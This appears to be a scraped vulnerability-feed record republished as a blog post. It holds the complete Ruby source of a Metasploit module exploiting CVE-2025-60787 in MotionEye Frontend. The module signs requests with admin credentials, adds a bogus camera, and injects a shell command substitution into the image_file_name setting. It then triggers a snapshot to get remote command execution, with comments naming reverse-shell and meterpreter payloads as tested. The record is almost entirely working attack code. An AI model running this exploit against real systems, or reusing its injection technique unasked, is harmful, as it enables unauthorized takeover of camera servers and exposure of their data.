{“lastseen”:”2025-10-10T19:33:33″,”description”:”This Metasploit module exploits a template injection…”,”published”:”2025-10-10T00:00:00″,”modified”:”2025-10-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:210394″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-60787″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n \\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n \\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Remote Code Execution Vulnerability in MotionEye Frontend (CVE-2025-60787)’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a template injection vulnerability in the MotionEye Frontend.\\n \\n MotionEye Frontend versions 0.43.1b4 and prior are vulnerable to OS Command Injection in configuration parameters such as image_file_name.\\n Unsanitized user input is written to MotionEye Frontend configuration files, allowing remote authenticated attackers with admin access to achieve code execution.\\n \\n Successful exploitation will result in the command executing as the user running\\n the web server, potentially exposing sensitive data or disrupting survey operations.\\n \\n An attacker can execute arbitrary system commands in the context of the user running the web server.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘Maksim Rogov’, # Metasploit Module\\n ‘prabhatverma47’ # Vulnerability Discovery\\n ],\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-60787’],\\n [‘URL’, ‘https:\/\/github.com\/prabhatverma47\/motionEye-RCE-through-config-parameter’]\\n ],\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e [ARCH_CMD],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Unix Command’,\\n {\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’],\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :unix_cmd,\\n ‘DefaultOptions’ =\\u003e {\\n # In the Docker container from the official repository, only curl is available\\n ‘FETCH_COMMAND’ =\\u003e ‘CURL’\\n }\\n # Tested with cmd\/unix\/reverse_bash\\n # Tested with cmd\/linux\/http\/x64\/meterpreter\/reverse_tcp\\n }\\n ]\\n ],\\n ‘Payload’ =\\u003e {\\n ‘BadChars’ =\\u003e ‘\\u0026\\\\\\\\’\\n },\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-09-09’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n }\\n )\\n )\\n \\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Path to MotionEye’, ‘\/’]),\\n OptString.new(‘USERNAME’, [true, ‘The username used to authenticate to MotionEye’, ‘admin’]),\\n OptString.new(‘PASSWORD’, [true, ‘The password used to authenticate to MotionEye’, ”])\\n ]\\n )\\n end\\n \\n def clean_string(data)\\n # Regex to match any character not allowed in the canonical string\\n # The regular expression is taken from the MotionEye source code.\\n # https:\/\/github.com\/motioneye-project\/motioneye\/blob\/b3ed73298554a1db1ea158c4bf6f2ec3a54ef5b9\/motioneye\/utils\/__init__.py#L39\\n signature_regex = %r{[^A-Za-z0-9\/?_.=\\u0026{}\\\\[\\\\]\\”:, -]}\\n \\n if data.nil?\\n # Return empty string if input is nil\\n return ”\\n elsif data.is_a?(String)\\n # Replace disallowed characters with ‘-‘ if input is already a string\\n return data.gsub(signature_regex, ‘-‘)\\n elsif data.respond_to?(:to_s)\\n # Convert to string and replace disallowed characters if possible\\n return data.to_s.gsub(signature_regex, ‘-‘)\\n end\\n \\n # Return empty string for all other cases\\n ”\\n end\\n \\n # Compute a SHA1 signature for the request using method, path, body, and user key.\\n def compute_signature(method, path, body = nil, key = ”)\\n # Parse the given path into URI components\\n parsed_uri = URI.parse(path)\\n \\n # Get and parse query string (if present)\\n query_string = parsed_uri.query\\n query_params = query_string.nil? ? {} : CGI.parse(query_string)\\n \\n # Prepare query parameters for signing: take first values and remove the ‘_signature’ field\\n sig_query = query_params\\n .transform_values(\\u0026:first)\\n .reject { |k, _v| k == ‘_signature’ }\\n \\n # Sort query arguments alphabetically\\n sorted_query_items = sig_query.sort_by { |k, _v| k }\\n \\n # Encode parameters and join them into a query string\\n query_components = sorted_query_items.map { |k, v| \\”#{k}=#{CGI.escape(v)}\\” }\\n canonical_query = query_components.join(‘\\u0026’)\\n \\n # Construct full canonical path with query\\n canonical_path = parsed_uri.path\\n canonical_path += \\”?#{canonical_query}\\” unless canonical_query.empty?\\n \\n # Clean up path and body before hashing\\n cleaned_path = clean_string(canonical_path)\\n cleaned_body = clean_string(body)\\n \\n key_hash = Digest::SHA1.hexdigest(key).downcase\\n \\n data = \\”#{method}:#{cleaned_path}:#{cleaned_body}:#{key_hash}\\”\\n \\n Digest::SHA1.hexdigest(data).downcase\\n end\\n \\n def generate_timestamp_ms\\n (Time.now.to_f * 1000).to_i\\n end\\n \\n # For the server to accept a request, all requests must be signed.\\n # This is a wrapper around the standard send_request_cgi function that adds the GET parameters _ (timestamp), username, and signature to the requests.\\n def send_signed_request_cgi(opts = {})\\n signature_key = datastore[‘PASSWORD’]\\n \\n method = opts[‘method’] || ‘GET’\\n base_path = opts[‘uri’]\\n body = nil\\n \\n if method.upcase == ‘POST’\\n if opts[‘data’]\\n body = opts[‘data’]\\n elsif opts[‘vars_post’]\\n body = URI.encode_www_form(opts[‘vars_post’])\\n end\\n end\\n \\n vars_get = {\\n ‘_username’ =\\u003e datastore[‘USERNAME’],\\n ‘_’ =\\u003e generate_timestamp_ms\\n }.merge!(opts.fetch(‘vars_get’, {}))\\n \\n query_string = URI.encode_www_form(vars_get)\\n \\n path_with_query = query_string.empty? ? base_path : \\”#{base_path}?#{query_string}\\”\\n \\n signature = compute_signature(\\n method,\\n path_with_query,\\n body,\\n signature_key\\n )\\n \\n new_opts = opts.dup\\n new_opts[‘vars_get’] = vars_get\\n new_opts[‘vars_get’][‘_signature’] = signature\\n \\n return send_request_cgi(new_opts)\\n end\\n \\n def add_camera\\n print_status(‘Adding malicious camera…’)\\n \\n res = send_signed_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/config\/add\/’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e {\\n ‘scheme’ =\\u003e ‘rstp’,\\n ‘host’ =\\u003e Faker::Internet.ip_v4_address,\\n ‘port’ =\\u003e ”,\\n ‘path’ =\\u003e ‘\/’,\\n ‘username’ =\\u003e ”,\\n ‘proto’ =\\u003e ‘netcam’\\n }.to_json\\n )\\n \\n unless res \\u0026\\u0026 res.code == 200\\n fail_with(Failure::UnexpectedReply, \\”#{peer} Server did not respond with the expected HTTP 200\\”)\\n end\\n \\n json_body = res.get_json_document\\n unless json_body\\n fail_with(Failure::UnexpectedReply, ‘Unable to parse the response’)\\n end\\n \\n unless json_body.key?(‘id’)\\n fail_with(Failure::UnexpectedReply, \\”#{peer} – Camera ID not found in response\\”)\\n end\\n \\n print_good(‘Camera successfully added’)\\n \\n return json_body[‘id’]\\n end\\n \\n def set_exploit(camera_id)\\n print_status(‘Setting up exploit…’)\\n \\n camera_name = Rex::Text.rand_text_alphanumeric(4..16)\\n res = send_signed_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/config\/0\/set\/’),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e {\\n camera_id =\\u003e {\\n ‘enabled’ =\\u003e true,\\n ‘name’ =\\u003e camera_name,\\n ‘proto’ =\\u003e ‘netcam’,\\n ‘auto_brightness’ =\\u003e false,\\n ‘rotation’ =\\u003e [0, 90, 180, 270].sample,\\n ‘framerate’ =\\u003e rand(2..30),\\n ‘privacy_mask’ =\\u003e false,\\n ‘storage_device’ =\\u003e ‘custom-path’,\\n ‘network_server’ =\\u003e ”,\\n ‘network_share_name’ =\\u003e ”,\\n ‘network_smb_ver’ =\\u003e ‘1.0’,\\n ‘network_username’ =\\u003e ”,\\n ‘network_password’ =\\u003e ”,\\n ‘root_directory’ =\\u003e \\”\/var\/lib\/motioneye\/#{camera_name}\\”,\\n ‘upload_enabled’ =\\u003e false,\\n ‘upload_picture’ =\\u003e false,\\n ‘upload_movie’ =\\u003e false,\\n ‘upload_service’ =\\u003e [‘ftp’, ‘sftp’, ‘webdav’].sample,\\n ‘upload_server’ =\\u003e ”,\\n ‘upload_port’ =\\u003e ”,\\n ‘upload_method’ =\\u003e [‘post’, ‘put’].sample,\\n ‘upload_location’ =\\u003e ”,\\n ‘upload_subfolders’ =\\u003e false,\\n ‘upload_username’ =\\u003e ”,\\n ‘upload_password’ =\\u003e ”,\\n ‘upload_endpoint_url’ =\\u003e ”,\\n ‘upload_access_key’ =\\u003e ”,\\n ‘upload_secret_key’ =\\u003e ”,\\n ‘upload_bucket’ =\\u003e ”,\\n ‘clean_cloud_enabled’ =\\u003e false,\\n ‘web_hook_storage_enabled’ =\\u003e false,\\n ‘command_storage_enabled’ =\\u003e false,\\n ‘text_overlay’ =\\u003e false,\\n ‘text_scale’ =\\u003e rand(1..3),\\n ‘video_streaming’ =\\u003e false,\\n ‘streaming_framerate’ =\\u003e rand(5..30),\\n ‘streaming_quality’ =\\u003e rand(50..95),\\n ‘streaming_resolution’ =\\u003e rand(50..95),\\n ‘streaming_server_resize’ =\\u003e false,\\n ‘streaming_port’ =\\u003e ‘9081’,\\n ‘streaming_auth_mode’ =\\u003e ‘disabled’,\\n ‘streaming_motion’ =\\u003e false,\\n ‘still_images’ =\\u003e true,\\n ‘image_file_name’ =\\u003e \\”$(#{payload.encoded})\\”,\\n ‘image_quality’ =\\u003e rand(50..95),\\n ‘capture_mode’ =\\u003e ‘manual’,\\n ‘preserve_pictures’ =\\u003e ‘0’,\\n ‘manual_snapshots’ =\\u003e true,\\n ‘movies’ =\\u003e false,\\n ‘movie_file_name’ =\\u003e ‘%Y-%m-%d\/%H-%M-%S’,\\n ‘movie_quality’ =\\u003e rand(50..95),\\n ‘movie_format’ =\\u003e ‘mp4 =\\u003e h264_v4l2m2m’,\\n ‘movie_passthrough’ =\\u003e false,\\n ‘recording_mode’ =\\u003e ‘motion-triggered’,\\n ‘max_movie_length’ =\\u003e ‘0’,\\n ‘preserve_movies’ =\\u003e ‘0’,\\n ‘motion_detection’ =\\u003e false,\\n ‘frame_change_threshold’ =\\u003e \\”0.#{Rex::Text.rand_text_numeric(16)}\\”,\\n ‘max_frame_change_threshold’ =\\u003e rand(0..1),\\n ‘auto_threshold_tuning’ =\\u003e false,\\n ‘auto_noise_detect’ =\\u003e false,\\n ‘noise_level’ =\\u003e rand(10..32),\\n ‘light_switch_detect’ =\\u003e ‘0’,\\n ‘despeckle_filter’ =\\u003e false,\\n ‘event_gap’ =\\u003e rand(5..30),\\n ‘pre_capture’ =\\u003e rand(1..5),\\n ‘post_capture’ =\\u003e rand(1..5),\\n ‘minimum_motion_frames’ =\\u003e rand(20..30),\\n ‘motion_mask’ =\\u003e false,\\n ‘show_frame_changes’ =\\u003e false,\\n ‘create_debug_media’ =\\u003e false,\\n ’email_notifications_enabled’ =\\u003e false,\\n ‘telegram_notifications_enabled’ =\\u003e false,\\n ‘web_hook_notifications_enabled’ =\\u003e false,\\n ‘web_hook_end_notifications_enabled’ =\\u003e false,\\n ‘command_notifications_enabled’ =\\u003e false,\\n ‘command_end_notifications_enabled’ =\\u003e false,\\n ‘working_schedule’ =\\u003e false,\\n ‘resolution’ =\\u003e [‘320×240’, ‘640×480’, ‘1280×720’].sample\\n }\\n }.to_json\\n )\\n \\n unless res \\u0026\\u0026 res.code == 200\\n fail_with(Failure::UnexpectedReply, \\”#{peer} Server did not respond with the expected HTTP 200\\”)\\n end\\n \\n print_good(‘Exploit setup complete’)\\n end\\n \\n def trigger_exploit(camera_id)\\n print_status(‘Triggering exploit…’)\\n \\n res = send_signed_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”\/action\/#{camera_id}\/snapshot\/\\”),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e ‘null’\\n )\\n \\n unless res \\u0026\\u0026 res.code == 200\\n fail_with(Failure::UnexpectedReply, \\”#{peer} Server did not respond with the expected HTTP 200\\”)\\n end\\n \\n print_good(‘Exploit triggered, waiting for session…’)\\n end\\n \\n def del_camera(camera_id)\\n print_status(‘Removing camera’)\\n \\n res = send_signed_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, \\”\/config\/#{camera_id}\/rem\/\\”),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e ‘null’\\n )\\n \\n unless res \\u0026\\u0026 res.code == 200\\n fail_with(Failure::UnexpectedReply, \\”#{peer} Server did not respond with the expected HTTP 200\\”)\\n end\\n \\n print_good(‘Camera removed successfully’)\\n end\\n \\n def check\\n res = send_request_cgi(\\n ‘uri’ =\\u003e normalize_uri(target_uri.path),\\n ‘method’ =\\u003e ‘GET’\\n )\\n \\n motion_version_span = res.get_html_document.at(‘tr.settings-item:has(td.settings-item-label span:contains(\\”motionEye Version\\”)) td.settings-item-value span.settings-item-label’)\\n motion_version = motion_version_span\\u0026.text\\u0026.strip\\n \\n if motion_version_span.nil? || motion_version.empty?\\n fail_with(Failure::UnexpectedReply, \\”#{peer} Failed to find motionEye version on the page\\”)\\n end\\n \\n clear_version = motion_version.gsub(\/[a-zA-Z]\/, ”)\\n if clear_version \\u003c ‘0.43.15’\\n return CheckCode::Appears(\\”Detected version #{motion_version}, which is vulnerable\\”)\\n end\\n \\n return CheckCode::Detected(\\”At the time of writing the module, no patch for this vulnerability exists. A newer version #{motion_version} has been found compared to the vulnerable releases; however, it is unclear whether the issue has been fixed. It is recommended to review the release notes\\”)\\n end\\n \\n def cleanup\\n del_camera(@camera_id) unless @camera_id.nil?\\n super\\n end\\n \\n def exploit\\n @camera_id = add_camera\\n set_exploit(@camera_id)\\n trigger_exploit(@camera_id)\\n end\\n end”,”sourceHref”:”https:\/\/packetstorm.news\/download\/210394″,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/210394\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-10T19:33:33″,”description”:”This Metasploit module exploits a template injection…”,”published”:”2025-10-10T00:00:00″,”modified”:”2025-10-10T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 MotionEye Frontend 0.43.1b4 Remote Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:210394″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-60787″],”sourceData”:”##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-21079","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n